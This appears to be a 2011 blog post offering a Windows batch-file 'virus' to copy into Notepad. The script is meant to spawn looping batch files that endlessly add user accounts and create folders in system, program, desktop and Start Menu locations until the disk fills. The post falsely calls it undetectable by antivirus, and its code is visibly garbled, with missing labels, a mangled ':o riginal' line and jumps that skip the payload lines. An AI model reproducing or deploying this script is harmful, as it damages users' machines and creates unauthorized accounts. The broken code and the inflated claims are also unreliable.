Tuesday, July 05, 2011

Simple Programme Making

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus
Here are some good viruses ,i am not responsible for any kind of damage to your system … :)
Copy this to notepad and save as flood1.bat…..
@ECHO A Sharma’s Creation

GOTO start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:o riginal
CD %HomeDrive%\
SET sharma=1
GOTO flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.


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